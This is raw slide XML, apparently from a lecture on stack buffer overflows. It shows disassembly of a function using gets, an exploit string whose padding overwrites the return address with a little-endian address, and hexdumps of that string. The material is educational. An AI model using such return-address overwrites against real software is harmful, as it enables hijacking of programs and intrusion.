                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  4005fa:	e8 01 ff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400500 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;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400612:       bf 5f 07 40 00          mov    $0x40075f,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400617:       b8 00 00 00 00          mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40061c:       e8 bf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4004e0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf@plt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400621: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400626:       e8 c5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4004f0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gets@plt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40062b:       48 8d 7c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400630:       e8 9b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400635:       48 83 c4 18             add    $0x18,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400639: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53" name="Oval 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64249702-A402-5444-8429-B5EF695A2FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189963" y="1877120"/>
            <a:ext cx="7661785"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06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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>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vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="14" presetClass="entr" presetSubtype="5"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randombar(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>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1"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1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="2" presetClass="exit" presetSubtype="4" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="999"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="33" presetID="22" presetClass="exit" presetSubtype="1" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="36" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="37" presetID="21" presetClass="entr" presetSubtype="1"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heel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="39"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8" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="1" animBg="1"/>
      <p:bldP spid="3" grpId="0" animBg="1"/>
      <p:bldP spid="48" grpId="1"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Creating the Exploit String</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2CE0AEB-3D5D-2B4F-8930-6FC610ADD4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571499" y="1821677"/>
            <a:ext cx="10782301" cy="1003026"/>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48 65 6C 6C 6F 2C 20 57   // fill the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6F 72 6C 64 21 0A 00 00   // fill the space between buffer and return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EB 05 40                  // new return address (byte reversed due to little-endian)</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1720599" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{878D469E-8372-2646-9B68-776A704DD202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="2961228"/>
            <a:ext cx="10782301" cy="389677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00000000  34 38 20 36 35 20 36 43  20 36 43 20 36 46 20 32  |48 65 6C 6C 6F 2|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  43 20 32 30 20 35 37 20  20 20 2f 2f 20 66 69 6c  |C 20 57   // fil|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000020  6c 20 74 68 65 20 62 75  66 66 65 72 0a 36 46 20  |l the buffer.6F |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000030  37 32 20 36 43 20 36 34  20 32 31 20 30 41 20 30  |72 6C 64 21 0A 0|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000040  30 20 30 30 20 20 20 2f  2f 20 66 69 6c 6c 20 74  |0 00   // fill t|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000050  68 65 20 73 70 61 63 65  20 62 65 74 77 65 65 6e  |he space between|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000060  20 62 75 66 66 65 72 20  61 6e 64 20 72 65 74 75  | buffer and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retu</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00000070  72 6e 20 61 64 64 72 65  73 73 0a 45 42 20 30 35  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>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address.EB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 05|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000080  20 34 30 20 20 20 20 20  20 20 20 20 20 20 20 20  | 40             |</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000090  20 20 20 20 20 2f 2f 20  6e 65 77 20 72 65 74 75  |     // new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retu</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000000a0  72 6e 20 61 64 64 72 65  73 73 20 28 62 79 74 65  |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> address (byte|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000b0  20 72 65 76 65 72 73 65  64 20 64 75 65 20 74 6f  | reversed due to|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000c0  20 6c 69 74 74 6c 65 2d  65 6e 64 69 61 6e 29 0a  | little-endian).|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000d0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DCEB10-247C-524F-8EBE-CCE41C3B5B12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514081" y="1795605"/>
            <a:ext cx="648237"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5A662A-91FB-B548-9656-077B4C629AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921448" y="3266308"/>
            <a:ext cx="919724" cy="3804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74CC1CD-048C-5247-B3D0-06F181921D6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="5"/>
            <a:endCxn id="13" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067386" y="2266956"/>
            <a:ext cx="988752" cy="1055061"/>
          </a:xfrm>
          <a:prstGeom prst="lin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16" name="Rounded Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB574FB0-8A0F-B94F-B667-A15C12A64D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3458542"/>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0a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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94370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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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5" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="exit" presetSubtype="5" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertic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14" presetClass="exit" presetSubtype="5" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertical)">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4" presetClass="exit" presetSubtype="5" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(vertic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4" presetClass="entr" presetSubtype="5"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vertic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Attacking the Vulnerability</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ounded Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78A56549-91BF-744B-BA00-265F05C5DE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="1350576"/>
            <a:ext cx="6493331" cy="15473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3" name="Rounded Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EAF03B-0A4C-B74A-B41C-21635944C015}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3118430"/>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0a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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BEEBBB-D660-244F-9612-E35503E4C0C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6610081" y="3505100"/>
            <a:ext cx="648237" cy="5522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69AD1AD-0821-E84E-8D08-56D71A85A8E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="4664534"/>
            <a:ext cx="9334502" cy="219346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vi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Did not return to caller! (insert maniacal laugh here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0B794DA-D8D5-3249-9F53-E8F80468C56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10373010" y="579133"/>
            <a:ext cx="911019" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rounded Rectangle 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B684FF7-2F5F-C64A-8D57-077EB56D17A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571498" y="3116086"/>
            <a:ext cx="10782301" cy="132556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exploit-</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hexdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -C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  48 65 6c 6c 6f 2c 20 57  6f 72 6c 64 21 00 00 00  |Hello, World!...|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010  eb 05 40                                          |..@|</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000013</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40A521C-65DE-E242-B2EA-5C8B60773F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7345825" y="1237664"/>
            <a:ext cx="4830980" cy="3182353"/>
            <a:chOff x="6512878" y="1197691"/>
            <a:chExt cx="4830980" cy="3182353"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{694E1031-4F96-BF40-8886-11B4C2AEB38D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6512878" y="2787821"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB4BF9D-3DCD-B44F-BAED-898C1F3ADA0B}"/>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57</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>'W'</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="Rectangle 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D542CE1-7901-1C4A-A841-CEA75517FD38}"/>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20</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
                    <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>' '</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="Rectangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A2C2A6-3621-E341-8142-6CA21D970292}"/>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2C</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFFF00"/>
                    </a:solidFill>
